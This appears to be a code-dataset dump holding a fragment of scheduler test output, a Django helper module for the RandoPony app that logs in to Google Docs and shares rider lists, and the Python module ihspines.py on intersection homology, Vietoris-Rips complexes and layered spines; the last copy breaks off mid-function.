0xEEEEEEEEE>, =D, true) Throw(An exception for B) Traceback (most recent call last): File LOCATION-INFO, in call val = func(*args) File LOCATION-INFO, in d_from_b_nested_raise fn_raises(b) File LOCATION-INFO, in fn_raises raise Exception('An exception for {{}}'.format(type(x).__name__)) Exception: An exception for B Computing Select(<{__name__}..B object at 0xEEEEEEEEE>, A) Computing Task(a_from_c_and_d(), <{__name__}..B object at 0xEEEEEEEEE>, A, true) Computing Task(c_from_b_nested_raise(), <{__name__}..B object at 0xEEEEEEEEE>, =C, true) Throw(An exception for B) Traceback (most recent call last): File LOCATION-INFO, in call val = func(*args) File LOCATION-INFO, in c_from_b_nested_raise fn_raises(b) File LOCATION-INFO, in fn_raises raise Exception('An exception for {{}}'.format(type(x).__name__)) Exception: An exception for B # No rules are available to compute A. Rules with errors: 1 {fmt_rule(upcast)}: No rule was available to compute MyInt. Maybe declare RootRule(MyInt)? This class records every non-empty batch of started and completed workunits received from the engine. # The execution of the single named @rule "fib" should be providing this one workunit. # Requesting a bigger fibonacci number will result in more rule executions and thus more reported workunits. # In this case, we expect 10 invocations of the `fib` rule. # rule_one should complete well-after the other rules because of the artificial delay in it caused by the sleep(). # Because of the artificial delay in rule_one, it should have time to be reported as # started but not yet finished. # rule_one should have no parent_id because its actual parent workunit was filted based on level # With the max_workunit_verbosity set to TRACE, we should see the workunit corresponding to the Select node. # need to call this so that self._scheduler is not None when we pass it to StreamingWorkunitHandler
| 1.893702
| 2
|
pasture/helpers.py
|
douglatornell/randopony
| 0
|
6628076
|
<gh_stars>0
"""Helper functions for the RandoPony apps.
"""
# Google Docs:
import gdata.acl.data
# Django:
from django.conf import settings
#RandoPony:
from .models import EmailAddress
def email2words(email):
"""Return a slightly obfuscated version of the email address.
Replaces @ with ' at ', and . with ' dot '.
"""
return email.replace('@', ' at ').replace('.', ' dot ')
def google_docs_login(service):
client = service()
client.ssl = True
username = EmailAddress.objects.get(key='google_docs').email
client.ClientLogin(username, settings.GOOGLE_DOCS_PASSWORD, '<PASSWORD>opony')
return client
def get_rider_list_template(template_name, client):
docs = client.get_resources()
for doc in docs.entry:
if doc.title.text == template_name:
template = doc
break
return template
def share_rider_list_publicly(doc, client):
scope = gdata.acl.data.AclScope(type='default')
role = gdata.acl.data.AclRole(value='reader')
acl_entry = gdata.acl.data.AclEntry(scope=scope, role=role)
client.Post(acl_entry, doc.get_acl_feed_link().href)
|
"""Helper functions for the RandoPony apps.
"""
# Google Docs:
import gdata.acl.data
# Django:
from django.conf import settings
#RandoPony:
from .models import EmailAddress
def email2words(email):
"""Return a slightly obfuscated version of the email address.
Replaces @ with ' at ', and . with ' dot '.
"""
return email.replace('@', ' at ').replace('.', ' dot ')
def google_docs_login(service):
client = service()
client.ssl = True
username = EmailAddress.objects.get(key='google_docs').email
client.ClientLogin(username, settings.GOOGLE_DOCS_PASSWORD, '<PASSWORD>opony')
return client
def get_rider_list_template(template_name, client):
docs = client.get_resources()
for doc in docs.entry:
if doc.title.text == template_name:
template = doc
break
return template
def share_rider_list_publicly(doc, client):
scope = gdata.acl.data.AclScope(type='default')
role = gdata.acl.data.AclRole(value='reader')
acl_entry = gdata.acl.data.AclEntry(scope=scope, role=role)
client.Post(acl_entry, doc.get_acl_feed_link().href)
|
en
| 0.817961
|
Helper functions for the RandoPony apps. # Google Docs: # Django: #RandoPony: Return a slightly obfuscated version of the email address. Replaces @ with ' at ', and . with ' dot '.
| 2.333667
| 2
|
ihspines.py
|
BanaglMaeder/layered-spines
| 0
|
6628077
|
<reponame>BanaglMaeder/layered-spines<gh_stars>0
import numpy as np
import copy
# Floor functions is used for certain perversity functions
from math import floor
from numpy.linalg import norm
# Delaunay triangulation used to generate Delaunay-Vietoris-Rips complexes
from scipy.spatial import Delaunay
###############################################################################
###########################Z/2Z SMITH NORMAL FORM##############################
###############################################################################
def AddRows(M, i, j):
N = copy.deepcopy(M)
N[i] = (M[i] + M[j]) % 2
return N
def ExchangeRows(M, i, j):
N = copy.deepcopy(M)
N[[i,j]] = M[[j,i]]
return N
def ExchangeCols(M, i, j):
N = copy.deepcopy(M)
N[:, [i,j]] = N[:, [j,i]]
return N
def AddCols(M, i, j):
N = copy.deepcopy(M)
N[:, i] = (M[:, i] + M[:, j] ) % 2
return N
def SNF(M, i=0):
m, n = M.shape
IndOnes = np.where(M[i:, i:] == 1)
if IndOnes[0].size:
j,k = IndOnes[0][0]+i, IndOnes[1][0]+i
if (j,k) != (i,i):
M = ExchangeRows(M, i, j)
M = ExchangeCols(M, i, k)
for l in range(i+1, m):
if M[l,i] == 1:
M = AddRows(M, l, i)
for h in range(i+1, n):
if M[i,h] == 1:
M = AddCols(M, h, i)
M = SNF(M, i+1)
return M
###############################################################################
########################SIMPLICIAL OPERATIONS##################################
###############################################################################
#Computing the dimension of a simpl. cplx.
def ComplexDimension(C):
if not C:
return -100
for k in range(len(C)-1,-1,-1):
if len(C[k]):
return k
return -100
# SimplexIntersections returns the "largest" face of given simpl. s and t
def SimplexIntersection(s, t):
return list(np.intersect1d(sorted(s),sorted(t)))
# function tests whether a simplex is contained in a simpl. cplx or not
def inArray(arr, list_of_arr):
for elem in list_of_arr:
if np.array_equal(sorted(arr), sorted(elem)):
return True
return False
# ComplexIntersection returns a list of simplices (not a complex but in a
# similar format) of the simplices in the simpl. cplx. K that are faces of the
# simplex s. The special format of the output allows us to apply the function
# ComplexDimension to it.
def ComplexIntersection(s,K):
k = len(s)-1
n = ComplexDimension(K)
if(k <= n):
if inArray(sorted(s),K[k]):
return sorted([s])
inter = []
for i in range(0,min(k+1,n+1)):
inter = inter + [[]]
for t in K[i]:
u = np.intersect1d(sorted(s),sorted(t)).tolist()
if (len(u) and not(inArray(sorted(u),inter[i])) and len(u)-1 == i):
inter[i].append(u)
return inter
###############################################################################
##########################INTERSECTION CHAIN COMPLEX###########################
###############################################################################
# Some common perversity functions
def TopP(k):
if k < 2:
return 0
else:
return k-2
def ZeroP(k):
return 0
def LowMidP(k):
if k < 2 :
return 0
else:
return floor((k-2)/2)
def UpMidP(k):
if k < 2:
return 0
else:
return floor((k-1)/2)
def minus(k):
return -1
# isProper decides whether or not a given simplex s is proper in the sense of
# corresponding to a simplicial chain that is transverse +- perversity
# Note: we allow a simplex to be proper even if it's boundary is not. The
# output is later on used to determine intersection chains.
def isProper(s, strata, p):
if (p == "0"):
p = ZeroP
if (p == "t"):
p = TopP
if (p == "m"):
p = LowMidP
if (p == "n"):
p = UpMidP
if (p == "-1"):
p = minus
j = len(s)-1
n = ComplexDimension(strata[0])
for i in range(1,len(strata)):
k = n - ComplexDimension(strata[i])
dimIntersection = ComplexDimension(ComplexIntersection(s,strata[i]))
if (dimIntersection > (j - k + p(k))):
return False
return True
# IS takes a simpl. cplx. C with specified stratification strata and a
# perversity p. It returns the simplices in C that are proper (in the above
# sense) and the ones that are not proper in two separate lists.
def IS(C,strata,p):
CP = []
CIP = []
for i in range(len(C)):
CP.append([])
CIP.append([])
for x in C[i]:
if isProper(x,strata,p):
CP[i].append(x)
else:
CIP[i].append(x)
return CP,CIP
# In the following we define some functions to perform a matrix reduction
# algorithm. This will be used to identify all simplicial intersection
# chains, also the non elementary ones.
def low(M,j):
col = np.nonzero(M[:,j])
if len(col[0]) == 0:
return -1
return np.where(M[:,j] == M[:,j][col[0]].min())[0].max()
# The input for the function MatrixReduction is a matrix M and an integer k.
# This routine executes elementary column transformations from left to right
# in order to eliminate nonzero entries below the row index k.
# The output includes the matrix M in reduced form and a lists columns whose
# entries below index k are all zero. This process works in Z/2Z only.
def MatrixReduction(M,k):
comb = []
for t in range(0,M.shape[1]):
comb.append([t])
ProperComb = []
stop = False
while not stop:
count = 0
for j in range(M.shape[1]-1,-1,-1):
if low(M,j) > k:
for i in range(j-1,-1,-1):
if low(M,i) == low(M,j) and low(M,j) > k:
M[:,j] = M[:,j]+M[:,i]
comb[j]= comb[j] + comb[i]
count = count+1
M = M%2
if count == 0:
stop = True
for j in range(0,M.shape[1]):
if low(M,j) <= k:
ProperComb.append(comb[j])
return M, ProperComb
# The function IC accepts a simpl. cplx. C, a stratification strata
# and a perversity p. The output includes the perversity p Intersection
# Chain Complex associated with the initial complex C. The filtration is
# specified by strata. Furthermore, IC also returns the Betti numbers of
# perversity p intersection homology.
def IC(C,strata,p):
CP, CIP = IS(C,strata,p)
n = len(CP)-1
ranks = [0]
# list for the resulting Intersection Chain Complex
ICC = []
for i in range(0,len(CP)):
ICC.append([])
for v in CP[0]:
ICC[0].append([v])
for i in range(n,0,-1):
ns1 = len(CP[i])
# Note: If there are no improper simplices in this dimension there is
# nothing to do
numImprop = len(CIP[i-1])
aC = CP[i-1] + CIP[i-1]
# Setting up the binary incidence matrix following the order in aC.
M = np.zeros((len(C[i-1]), ns1), dtype=int)
for j in range (0, ns1):
s = CP[i][j]
facets = []
for k in range (0, i+1):
f = s.copy()
del f[k]
facets = facets + [f]
for k in range (0, len(C[i-1])):
if aC[k] in facets:
M[k,j] = 1
redM = MatrixReduction(M,len(C[i-1])-1-numImprop)
# We determine the intersection chain complex with redM[1].
# The list redM[1] contains indices corresponding to the proper
# i-simplices that make as sum an allowable simpl. chain
for l in redM[1]:
c = []
for ind in l:
c.append(CP[i][ind])
ICC[i].append(c)
# Next, we calculate the Betti numbers via the rank of a reduced matrix
B = redM[0]
A = np.zeros((len(C[i-1]), ns1), dtype=int)
for j in range(0,B.shape[1]):
if low(B,j) <= len(C[i-1])-1-numImprop:
A[:,j] = B[:,j]
shapeA = np.shape(A)
if shapeA[0] == 0 or shapeA[1] == 0:
R = 0
else:
A_snf = SNF(A)
R = 0
for i in range(0,min(shapeA[0],shapeA[1])):
if A_snf[i,i] == 1:
R = R+1
ranks.append(R)
ranks.append(0)
ranks = ranks[::-1]
BettiNumbers = []
n = len(ICC)
for i in range(n):
Betti = len(ICC[i])-ranks[i]-ranks[i+1]
BettiNumbers.append(Betti)
return ICC, BettiNumbers
# Auxiliary function to check whether or not a given simpl. cplx. represents a
# pseudomanifold
def isPseudomanifold(C):
n = ComplexDimension(C)
countlist = []
for i in range(0,n):
for s in C[i]:
count = 0
for t in C[n]:
if len(SimplexIntersection(s,t))==len(s):
count = count +1
if count == 0:
return False
if i == n-1:
countlist.append(count)
if count != 2:
return [False,countlist]
return True
###############################################################################
###################SIMPLICIAL COMPLEXES FROM POINT CLOUDS######################
###############################################################################
# DelVR complex, compare do DelCech complex as in Bauer & Edelsbrunner 2017.
# Currently restricted to point clouds xyz of dimension <= 3.
# We employed the function Delaunay from the scipy.spatial package to realize
# Delaunay triangulations.
def DelaunayComplex(xyz,r):
dim=len(xyz[0])
edges = []
triangles = []
tetrahedra = []
lengthpc = len(xyz)
vertices = [[i] for i in range(0,lengthpc)]
pcnp = np.array(xyz)
delaunay = Delaunay(xyz).simplices
# First we construct Delaunay triangulation and then select simplices
# whose vertices lie pairwise closer than distance r to each other.
if dim==2:
DelE = []
DelTr = delaunay
for i in range(0, len(DelTr)):
triple = DelTr[i]
triple.sort()
DelE.append(list([triple[0], triple[1]]))
DelE.append(list([triple[0], triple[2]]))
DelE.append(list([triple[1], triple[2]]))
# DelE may contain duplicate simplices. So we need to remove these
# duplicates:
auxtup = [tuple(s) for s in DelE]
auxset = set(auxtup)
auxlist = list(auxset)
DelE = [list(t) for t in auxlist]
if dim==3:
DelE = []
DelTr = []
DelTe = delaunay
for i in range(0, len(DelTe)):
quad = DelTe[i]
quad.sort()
DelTr.append(list([quad[0], quad[1], quad[2]]))
DelTr.append(list([quad[0], quad[1], quad[3]]))
DelTr.append(list([quad[0], quad[2], quad[3]]))
DelTr.append(list([quad[1], quad[2], quad[3]]))
auxtup = [tuple(s) for s in DelTr]
auxset = set(auxtup)
auxlist = list(auxset)
DelTr = [list(t) for t in auxlist]
for i in range(0, len(DelTr)):
triple = DelTr[i]
DelE.append(list([triple[0], triple[1]]))
DelE.append(list([triple[0], triple[2]]))
DelE.append(list([triple[1], triple[2]]))
auxtup = [tuple(s) for s in DelE]
auxset = set(auxtup)
auxlist = list(auxset)
DelE = [list(t) for t in auxlist]
for e in DelE:
i = e[0]
j = e[1]
distance = norm(pcnp[i] - pcnp[j])
if(r >= distance/2):
edges.append([i, j])
for tri in DelTr:
i = tri[0]
j = tri[1]
k = tri[2]
M = max(norm(pcnp[j]-pcnp[k]),
norm(pcnp[i]-pcnp[j]),
norm(pcnp[i]-pcnp[k]))
if(r >= M/2):
triangles.append([i, j, k])
if dim == 3:
for tet in DelTe:
i = tet[0]
j = tet[1]
k = tet[2]
l = tet[3]
M = max(norm(pcnp[i]-pcnp[j]),
norm(pcnp[i]-pcnp[k]),
norm(pcnp[i]-pcnp[l]),
norm(pcnp[j]-pcnp[k]),
norm(pcnp[j]-pcnp[l]),
norm(pcnp[k]-pcnp[l]))
if(r >= M/2):
tetrahedra.append([i, j, k,l])
return [vertices,edges,triangles,tetrahedra]
# The function VRComplex calculates the Vietoris-Rips complex of a
# point cloud xyz for the radius r. Currently the complex is restricted
# to dimension 3.
def VRComplex(xyz,r):
lengthpc = len(xyz)
pcnp = [np.array(x) for x in xyz]
VR0S = [[i] for i in range (0, lengthpc)]
Diameter = 2*r
VR1S = []
for i in range(0, lengthpc):
for j in range (i+1, lengthpc):
if norm(pcnp[i] - pcnp[j]) < Diameter:
VR1S = VR1S + [[i,j]]
VR2S = []
for s1 in VR1S:
for i in range (0, lengthpc):
j = s1[0]
k = s1[1]
if i != j and i != k:
x = pcnp[j]
y = pcnp[k]
nx = norm(pcnp[i] - x)
ny = norm(pcnp[i] - y)
if nx < Diameter and ny < Diameter:
# Build a 2-simplex s2 with vertices i,j,k:
s2 = [i,j,k]
# s2 need not be an >oriented< 2-simplex; we first
# need to sort the vertices in ascending order:
s2.sort()
# add the oriented 2-simplex s2 to the
# Vietoris-Rips complex:
VR2S = VR2S + [s2]
# VR2S may contain duplicate simplices. So we need to remove these
# duplicates:
auxtup = [tuple(s) for s in VR2S]
auxset = set(auxtup)
auxlist = list(auxset)
VR2S = [list(t) for t in auxlist]
VR3S = []
# We compute the 3-simplices of the Vietoris-Rips complex.
# This operation is quadratic in the number of data points/2-simplices.
# s2 ranges over all 2-simplices:
for s2 in VR2S:
for i in range (0, lengthpc):
j = s2[0]
k = s2[1]
l = s2[2]
if i != j and i != k and i != l:
x = pcnp[j]
y = pcnp[k]
z = pcnp[l]
nx = norm(pcnp[i] - x)
ny = norm(pcnp[i] - y)
nz = norm(pcnp[i] - z)
if nx < Diameter and ny < Diameter and nz < Diameter:
# Build a 3-simplex s3 with vertices i,j,k,l:
s3 = [i,j,k,l]
# s3 need not be an >oriented< 3-simplex; we first
# need to sort the vertices in ascending order:
s3.sort()
# add the oriented 3-simplex s3 to the
# Vietoris-Rips complex:
VR3S = VR3S + [s3]
auxtup = [tuple(s) for s in VR3S]
auxset = set(auxtup)
auxlist = list(auxset)
VR3S = [list(t) for t in auxlist]
return [VR0S,VR1S,VR2S,VR3S]
###############################################################################
###############################(LAYERED) SPINES################################
###############################################################################
# Auxillary function to check if a given simplex t is principal in a simpl.
# cplx. C
def isPrincipal(C,t):
k = len(t)-1
if k == ComplexDimension(C):
return True
for s in C[k+1]:
if len(SimplexIntersection(s,t)) == t:
return False
return True
# Princ will take a simpl. cplx. C and a simplex s of C.
# The output is the set of principal cofaces of s in C
def Princ(C,s):
n = ComplexDimension(C)
k = len(s)-1
if(k == n):
return []
count = 0
p = []
for t in C[k+1]:
if len(SimplexIntersection(s,t))-1 == k:
count = count+1
if count > 1:
return []
if isPrincipal(C,t):
p.append(t)
return p
# isAdmissable is an auxiliary function to check the extra condition for an
# intermediate collapse to be elementary
def isAdmissible(s,p,S):
T = ComplexIntersection(p,S)
for t in T:
for r in t:
inter = len(SimplexIntersection(r,s))
if (inter == 0 or inter == len(s)):
return False
return True
# Function to realise a Collapse. Only applied if condition for an elementary
# collapse are fulfilled.
def ElemCollapse(C,s,p):
k = len(p)-1
C[k].remove(p)
C[k-1].remove(s)
return C
# The Function Spine computes the layered spine of a given Simpl. Cplx.(Cplx)
# with resp. to S0 and C0. If one of them is empty (this has to be specified)
# the result will be a spine of Cplx in the usual sense.
def Spine(Cplx, S0 , C0):
# We create deep copies to not change the input
# Note: This doubles the required memory
K = copy.deepcopy(Cplx)
n = ComplexDimension(K)
S = copy.deepcopy(S0)
C = copy.deepcopy(C0)
IM = [[]]
for i in range(1,n+1):
# Every increment will add a list to S, C and IM to be the i-th Skeleton
S = S + [[]]
C = C + [[]]
IM = IM + [[]]
for t in K[i]:
# Here we check if all vertices of a simplex t lie in S, C, or partly
# in both (i.e. in IM)
if ComplexDimension(S) >= 0:
a = len(ComplexIntersection(t,S0)[0])
else:
a = -100
if ComplexDimension(C) >= 0:
b = len(ComplexIntersection(t,C0)[0])
else:
b = -100
if a == len(t):
S[i].append(t)
if b == len(t):
C[i].append(t)
if a != len(t) and b!=len(t):
IM[i].append(t)
#S-Collapse
stop = False
# After the execution of an ElemCollapse we have to go through the
# remaining simplices because simplices can become free after a collapse.
while not stop:
count = 0
for i in range(min(ComplexDimension(K)-1,ComplexDimension(S)-1),-1,-1):
# Creating a copy of S to iterate over
Scopy = copy.deepcopy(S)
for s in Scopy[i]:
# We search the i-th skeleton for free faces
princ_s = Princ(K,s)
# s is free if there is exactly one princ coface and none other
# princ_s either contains the unique principal coface of s
# if s is free or it is an empty list
if len(princ_s) == 1:
if princ_s[0] in S[i+1]:
K = ElemCollapse(K,s,princ_s[0])
S = ElemCollapse(S,s,princ_s[0])
count = count +1
# If no collapse has been executed we are done and break the while-loop
if count == 0:
stop = True
#C-Collapses
stop = False
while not stop:
count = 0
for i in range(min(ComplexDimension(K)-1,ComplexDimension(C)-1),-1,-1):
Ccopy = copy.deepcopy(C)
for c in Ccopy[i]:
princ_c = Princ(K,c)
if len(princ_c) == 1:
if princ_c[0] in C[i+1]:
K = ElemCollapse(K,c,princ_c[0])
C = ElemCollapse(C,c,princ_c[0])
count = count +1
if count == 0:
stop = True
#Intermediate-Collapses
stop = False
while not stop:
count = 0
for j in range(min(ComplexDimension(K)-1,ComplexDimension(IM)-1),-1,-1):
IMcopy = copy.deepcopy(IM)
for i in IMcopy[j]:
princ_i = Princ(K,i)
if len(princ_i) == 1:
# Note: we have to check an extra condition for
# intermediate collapses to be elementary
if isAdmissible(i, princ_i[0], S):
K = ElemCollapse(K,i,princ_i[0])
IM = ElemCollapse(IM,i,princ_i[0])
count = count + 1
if count == 0:
stop = True
#C-Collapses
stop = False
while not stop:
count = 0
for i in range(min(ComplexDimension(K)-1,ComplexDimension(C)-1),-1,-1):
Ccopy = copy.deepcopy(C)
for c in Ccopy[i]:
princ_c = Princ(K,c)
if len(princ_c) == 1:
if princ_c[0] in C[i+1]:
K = ElemCollapse(K,c,princ_c[0])
C = ElemCollapse(C,c,princ_c[0])
count = count +1
if count == 0:
stop = True
return K
|
import numpy as np
import copy
# Floor functions is used for certain perversity functions
from math import floor
from numpy.linalg import norm
# Delaunay triangulation used to generate Delaunay-Vietoris-Rips complexes
from scipy.spatial import Delaunay
###############################################################################
###########################Z/2Z SMITH NORMAL FORM##############################
###############################################################################
def AddRows(M, i, j):
N = copy.deepcopy(M)
N[i] = (M[i] + M[j]) % 2
return N
def ExchangeRows(M, i, j):
N = copy.deepcopy(M)
N[[i,j]] = M[[j,i]]
return N
def ExchangeCols(M, i, j):
N = copy.deepcopy(M)
N[:, [i,j]] = N[:, [j,i]]
return N
def AddCols(M, i, j):
N = copy.deepcopy(M)
N[:, i] = (M[:, i] + M[:, j] ) % 2
return N
def SNF(M, i=0):
m, n = M.shape
IndOnes = np.where(M[i:, i:] == 1)
if IndOnes[0].size:
j,k = IndOnes[0][0]+i, IndOnes[1][0]+i
if (j,k) != (i,i):
M = ExchangeRows(M, i, j)
M = ExchangeCols(M, i, k)
for l in range(i+1, m):
if M[l,i] == 1:
M = AddRows(M, l, i)
for h in range(i+1, n):
if M[i,h] == 1:
M = AddCols(M, h, i)
M = SNF(M, i+1)
return M
###############################################################################
########################SIMPLICIAL OPERATIONS##################################
###############################################################################
#Computing the dimension of a simpl. cplx.
def ComplexDimension(C):
if not C:
return -100
for k in range(len(C)-1,-1,-1):
if len(C[k]):
return k
return -100
# SimplexIntersections returns the "largest" face of given simpl. s and t
def SimplexIntersection(s, t):
return list(np.intersect1d(sorted(s),sorted(t)))
# function tests whether a simplex is contained in a simpl. cplx or not
def inArray(arr, list_of_arr):
for elem in list_of_arr:
if np.array_equal(sorted(arr), sorted(elem)):
return True
return False
# ComplexIntersection returns a list of simplices (not a complex but in a
# similar format) of the simplices in the simpl. cplx. K that are faces of the
# simplex s. The special format of the output allows us to apply the function
# ComplexDimension to it.
def ComplexIntersection(s,K):
k = len(s)-1
n = ComplexDimension(K)
if(k <= n):
if inArray(sorted(s),K[k]):
return sorted([s])
inter = []
for i in range(0,min(k+1,n+1)):
inter = inter + [[]]
for t in K[i]:
u = np.intersect1d(sorted(s),sorted(t)).tolist()
if (len(u) and not(inArray(sorted(u),inter[i])) and len(u)-1 == i):
inter[i].append(u)
return inter
###############################################################################
##########################INTERSECTION CHAIN COMPLEX###########################
###############################################################################
# Some common perversity functions
def TopP(k):
if k < 2:
return 0
else:
return k-2
def ZeroP(k):
return 0
def LowMidP(k):
if k < 2 :
return 0
else:
return floor((k-2)/2)
def UpMidP(k):
if k < 2:
return 0
else:
return floor((k-1)/2)
def minus(k):
return -1
# isProper decides whether or not a given simplex s is proper in the sense of
# corresponding to a simplicial chain that is transverse +- perversity
# Note: we allow a simplex to be proper even if it's boundary is not. The
# output is later on used to determine intersection chains.
def isProper(s, strata, p):
if (p == "0"):
p = ZeroP
if (p == "t"):
p = TopP
if (p == "m"):
p = LowMidP
if (p == "n"):
p = UpMidP
if (p == "-1"):
p = minus
j = len(s)-1
n = ComplexDimension(strata[0])
for i in range(1,len(strata)):
k = n - ComplexDimension(strata[i])
dimIntersection = ComplexDimension(ComplexIntersection(s,strata[i]))
if (dimIntersection > (j - k + p(k))):
return False
return True
# IS takes a simpl. cplx. C with specified stratification strata and a
# perversity p. It returns the simplices in C that are proper (in the above
# sense) and the ones that are not proper in two separate lists.
def IS(C,strata,p):
CP = []
CIP = []
for i in range(len(C)):
CP.append([])
CIP.append([])
for x in C[i]:
if isProper(x,strata,p):
CP[i].append(x)
else:
CIP[i].append(x)
return CP,CIP
# In the following we define some functions to perform a matrix reduction
# algorithm. This will be used to identify all simplicial intersection
# chains, also the non elementary ones.
def low(M,j):
col = np.nonzero(M[:,j])
if len(col[0]) == 0:
return -1
return np.where(M[:,j] == M[:,j][col[0]].min())[0].max()
# The input for the function MatrixReduction is a matrix M and an integer k.
# This routine executes elementary column transformations from left to right
# in order to eliminate nonzero entries below the row index k.
# The output includes the matrix M in reduced form and a lists columns whose
# entries below index k are all zero. This process works in Z/2Z only.
def MatrixReduction(M,k):
comb = []
for t in range(0,M.shape[1]):
comb.append([t])
ProperComb = []
stop = False
while not stop:
count = 0
for j in range(M.shape[1]-1,-1,-1):
if low(M,j) > k:
for i in range(j-1,-1,-1):
if low(M,i) == low(M,j) and low(M,j) > k:
M[:,j] = M[:,j]+M[:,i]
comb[j]= comb[j] + comb[i]
count = count+1
M = M%2
if count == 0:
stop = True
for j in range(0,M.shape[1]):
if low(M,j) <= k:
ProperComb.append(comb[j])
return M, ProperComb
# The function IC accepts a simpl. cplx. C, a stratification strata
# and a perversity p. The output includes the perversity p Intersection
# Chain Complex associated with the initial complex C. The filtration is
# specified by strata. Furthermore, IC also returns the Betti numbers of
# perversity p intersection homology.
def IC(C,strata,p):
CP, CIP = IS(C,strata,p)
n = len(CP)-1
ranks = [0]
# list for the resulting Intersection Chain Complex
ICC = []
for i in range(0,len(CP)):
ICC.append([])
for v in CP[0]:
ICC[0].append([v])
for i in range(n,0,-1):
ns1 = len(CP[i])
# Note: If there are no improper simplices in this dimension there is
# nothing to do
numImprop = len(CIP[i-1])
aC = CP[i-1] + CIP[i-1]
# Setting up the binary incidence matrix following the order in aC.
M = np.zeros((len(C[i-1]), ns1), dtype=int)
for j in range (0, ns1):
s = CP[i][j]
facets = []
for k in range (0, i+1):
f = s.copy()
del f[k]
facets = facets + [f]
for k in range (0, len(C[i-1])):
if aC[k] in facets:
M[k,j] = 1
redM = MatrixReduction(M,len(C[i-1])-1-numImprop)
# We determine the intersection chain complex with redM[1].
# The list redM[1] contains indices corresponding to the proper
# i-simplices that make as sum an allowable simpl. chain
for l in redM[1]:
c = []
for ind in l:
c.append(CP[i][ind])
ICC[i].append(c)
# Next, we calculate the Betti numbers via the rank of a reduced matrix
B = redM[0]
A = np.zeros((len(C[i-1]), ns1), dtype=int)
for j in range(0,B.shape[1]):
if low(B,j) <= len(C[i-1])-1-numImprop:
A[:,j] = B[:,j]
shapeA = np.shape(A)
if shapeA[0] == 0 or shapeA[1] == 0:
R = 0
else:
A_snf = SNF(A)
R = 0
for i in range(0,min(shapeA[0],shapeA[1])):
if A_snf[i,i] == 1:
R = R+1
ranks.append(R)
ranks.append(0)
ranks = ranks[::-1]
BettiNumbers = []
n = len(ICC)
for i in range(n):
Betti = len(ICC[i])-ranks[i]-ranks[i+1]
BettiNumbers.append(Betti)
return ICC, BettiNumbers
# Auxiliary function to check whether or not a given simpl. cplx. represents a
# pseudomanifold
def isPseudomanifold(C):
n = ComplexDimension(C)
countlist = []
for i in range(0,n):
for s in C[i]:
count = 0
for t in C[n]:
if len(SimplexIntersection(s,t))==len(s):
count = count +1
if count == 0:
return False
if i == n-1:
countlist.append(count)
if count != 2:
return [False,countlist]
return True
###############################################################################
###################SIMPLICIAL COMPLEXES FROM POINT CLOUDS######################
###############################################################################
# DelVR complex, compare do DelCech complex as in Bauer & Edelsbrunner 2017.
# Currently restricted to point clouds xyz of dimension <= 3.
# We employed the function Delaunay from the scipy.spatial package to realize
# Delaunay triangulations.
def DelaunayComplex(xyz,r):
dim=len(xyz[0])
edges = []
triangles = []
tetrahedra = []
lengthpc = len(xyz)
vertices = [[i] for i in range(0,lengthpc)]
pcnp = np.array(xyz)
delaunay = Delaunay(xyz).simplices
# First we construct Delaunay triangulation and then select simplices
# whose vertices lie pairwise closer than distance r to each other.
if dim==2:
DelE = []
DelTr = delaunay
for i in range(0, len(DelTr)):
triple = DelTr[i]
triple.sort()
DelE.append(list([triple[0], triple[1]]))
DelE.append(list([triple[0], triple[2]]))
DelE.append(list([triple[1], triple[2]]))
# DelE may contain duplicate simplices. So we need to remove these
# duplicates:
auxtup = [tuple(s) for s in DelE]
auxset = set(auxtup)
auxlist = list(auxset)
DelE = [list(t) for t in auxlist]
if dim==3:
DelE = []
DelTr = []
DelTe = delaunay
for i in range(0, len(DelTe)):
quad = DelTe[i]
quad.sort()
DelTr.append(list([quad[0], quad[1], quad[2]]))
DelTr.append(list([quad[0], quad[1], quad[3]]))
DelTr.append(list([quad[0], quad[2], quad[3]]))
DelTr.append(list([quad[1], quad[2], quad[3]]))
auxtup = [tuple(s) for s in DelTr]
auxset = set(auxtup)
auxlist = list(auxset)
DelTr = [list(t) for t in auxlist]
for i in range(0, len(DelTr)):
triple = DelTr[i]
DelE.append(list([triple[0], triple[1]]))
DelE.append(list([triple[0], triple[2]]))
DelE.append(list([triple[1], triple[2]]))
auxtup = [tuple(s) for s in DelE]
auxset = set(auxtup)
auxlist = list(auxset)
DelE = [list(t) for t in auxlist]
for e in DelE:
i = e[0]
j = e[1]
distance = norm(pcnp[i] - pcnp[j])
if(r >= distance/2):
edges.append([i, j])
for tri in DelTr:
i = tri[0]
j = tri[1]
k = tri[2]
M = max(norm(pcnp[j]-pcnp[k]),
norm(pcnp[i]-pcnp[j]),
norm(pcnp[i]-pcnp[k]))
if(r >= M/2):
triangles.append([i, j, k])
if dim == 3:
for tet in DelTe:
i = tet[0]
j = tet[1]
k = tet[2]
l = tet[3]
M = max(norm(pcnp[i]-pcnp[j]),
norm(pcnp[i]-pcnp[k]),
norm(pcnp[i]-pcnp[l]),
norm(pcnp[j]-pcnp[k]),
norm(pcnp[j]-pcnp[l]),
norm(pcnp[k]-pcnp[l]))
if(r >= M/2):
tetrahedra.append([i, j, k,l])
return [vertices,edges,triangles,tetrahedra]
# The function VRComplex calculates the Vietoris-Rips complex of a
# point cloud xyz for the radius r. Currently the complex is restricted
# to dimension 3.
def VRComplex(xyz,r):
lengthpc = len(xyz)
pcnp = [np.array(x) for x in xyz]
VR0S = [[i] for i in range (0, lengthpc)]
Diameter = 2*r
VR1S = []
for i in range(0, lengthpc):
for j in range (i+1, lengthpc):
if norm(pcnp[i] - pcnp[j]) < Diameter:
VR1S = VR1S + [[i,j]]
VR2S = []
for s1 in VR1S:
for i in range (0, lengthpc):
j = s1[0]
k = s1[1]
if i != j and i != k:
x = pcnp[j]
y = pcnp[k]
nx = norm(pcnp[i] - x)
ny = norm(pcnp[i] - y)
if nx < Diameter and ny < Diameter:
# Build a 2-simplex s2 with vertices i,j,k:
s2 = [i,j,k]
# s2 need not be an >oriented< 2-simplex; we first
# need to sort the vertices in ascending order:
s2.sort()
# add the oriented 2-simplex s2 to the
# Vietoris-Rips complex:
VR2S = VR2S + [s2]
# VR2S may contain duplicate simplices. So we need to remove these
# duplicates:
auxtup = [tuple(s) for s in VR2S]
auxset = set(auxtup)
auxlist = list(auxset)
VR2S = [list(t) for t in auxlist]
VR3S = []
# We compute the 3-simplices of the Vietoris-Rips complex.
# This operation is quadratic in the number of data points/2-simplices.
# s2 ranges over all 2-simplices:
for s2 in VR2S:
for i in range (0, lengthpc):
j = s2[0]
k = s2[1]
l = s2[2]
if i != j and i != k and i != l:
x = pcnp[j]
y = pcnp[k]
z = pcnp[l]
nx = norm(pcnp[i] - x)
